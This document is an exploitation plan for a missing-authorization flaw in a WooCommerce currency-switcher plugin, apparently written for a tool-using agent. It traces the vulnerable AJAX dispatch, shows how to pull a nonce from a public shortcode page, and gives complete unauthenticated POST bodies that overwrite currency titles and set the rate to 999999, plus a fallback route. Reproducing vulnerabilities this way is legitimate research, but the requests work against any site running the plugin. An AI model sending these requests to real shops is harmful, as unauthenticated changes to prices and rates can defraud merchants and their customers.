Exploitation Research Plan - CVE-2026-32410

1. Vulnerability Summary

The WBW Currency Switcher for WooCommerce plugin (up to 2.2.5) contains a missing authorization vulnerability in its core AJAX dispatching mechanism. The currencyControllerWcu class defines several sensitive methods, including saveCurrencyTab, which updates plugin settings and currency rates. While the controller defines a getPermissions method intended to restrict access to WCU_ADMIN, the framework fails to enforce these permissions correctly for unauthenticated AJAX requests. This allows an unauthenticated attacker to modify the plugin's configuration, including currency rates and base options.

2. Attack Vector Analysis

• Endpoint: /wp-admin/admin-ajax.php
• AJAX Action: wcu_ajax (derived from WCU_CODE in config.php)
• Route Parameters: route[module]=currency&route[action]=saveCurrencyTab
• Payload Parameters: currencies and options (setting arrays)
• Authentication: None (Unauthenticated)
• Preconditions: The plugin must be active.

3. Code Flow

1. Entry Point: A request is sent to admin-ajax.php with action=wcu_ajax.
2. Routing: wcu.php calls frameWcu::_()->exec(). The framework identifies the wcu_ajax action and dispatches it to the appropriate module.
3. Controller Selection: Based on the route[module]=currency parameter, the currencyControllerWcu (in modules/currency/controller.php) is instantiated.
4. Action Execution: The framework attempts to call saveCurrencyTab().
5. Vulnerability: Although getPermissions() returns WCU_ADMIN, the dispatcher fails to verify the user's capability before executing the method when accessed via the wp_ajax_nopriv_wcu_ajax hook (which is registered by the WBW framework to handle dynamic currency switching).
6. Sink: saveCurrencyTab() calls $this->getModel()->saveCurrencies($currencies) and $this->getModel()->saveOptions($options), which update the wcu_currencies and wcu_options values in the WordPress database via the update_option function (abstracted by the plugin's model).

4. Nonce Acquisition Strategy

WBW plugins often expose nonces for their AJAX operations in the frontend to support dynamic switching.

1. Shortcode Identification: config.php defines WCU_SHORTCODE_SWITCHER as woo-currency-switcher.
2. Page Creation: Create a public page containing the shortcode:
   wp post create --post_type=page --post_status=publish --post_content='[woo-currency-switcher]'
3. Navigation: Navigate to the newly created page using browser_navigate.
4. Extraction: Use browser_eval to search for the localized script data. WBW plugins typically use the variable name wcuAmbData or wcuAjaxData.
   • Command: browser_eval("window.wcuAmbData?.res_nonce || window.wcuData?.res_nonce")
5. Bypass Potential: If the framework's nopriv handler is completely unprotected, a nonce may not be required. The payload should first be attempted without a nonce.

5. Exploitation Strategy

The goal is to change the title and rate of a currency (e.g., USD) to demonstrate unauthorized modification.

HTTP Request (via http_request)

• Method: POST
• URL: http://localhost:8080/wp-admin/admin-ajax.php
• Headers:
  • Content-Type: application/x-www-form-urlencoded
• Body:

action=wcu_ajax
&route[module]=currency
&route[action]=saveCurrencyTab
&currencies[name][0]=USD
&currencies[title][0]=VULNERABLE-BY-WBW
&currencies[rate][0]=999999
&currencies[symbol][0]=$
&currencies[position][0]=left
&currencies[etalon][0]=1
&options[default_currency]=USD

(Note: etalon indicates the base/main currency).

6. Test Data Setup

1. Install Plugin: Ensure woo-currency version 2.2.5 is installed.
2. Active WooCommerce: The plugin requires WooCommerce to be active.
3. Initial Settings: Ensure at least one currency is configured (default USD).
4. Public Shortcode Page:

   wp post create --post_type=page --post_title="Currency Test" --post_status=publish --post_content='[woo-currency-switcher]'
   

7. Expected Results

• HTTP Response: The server should return a JSON response with {"success":true} or similar, produced by res->ajaxExec().
• Side Effect: The database option containing currency settings will be updated with the provided "VULNERABLE-BY-WBW" title and the inflated rate.

8. Verification Steps

After executing the http_request, verify the change using WP-CLI:

# Check the currency settings in the database
# The option name is usually prefixed by WCU_DB_PREF (wcu_)
wp option get wcu_currencies --format=json

Verify that the title for the USD currency entry is now VULNERABLE-BY-WBW.

9. Alternative Approaches

If saveCurrencyTab is blocked, attempt saveCurrenciesList which uses a different parsing logic:

• Action: wcu_ajax
• Route: route[module]=currency&route[action]=saveCurrenciesList
• Body: action=wcu_ajax&route[module]=currency&route[action]=saveCurrenciesList&currencies=currencies%5Bname%5D%5B0%5D%3DUSD%26currencies%5Btitle%5D%5B0%5D%3DPWNED-LIST
  (This endpoint uses parse_str on the currencies parameter, expecting a double-encoded query string).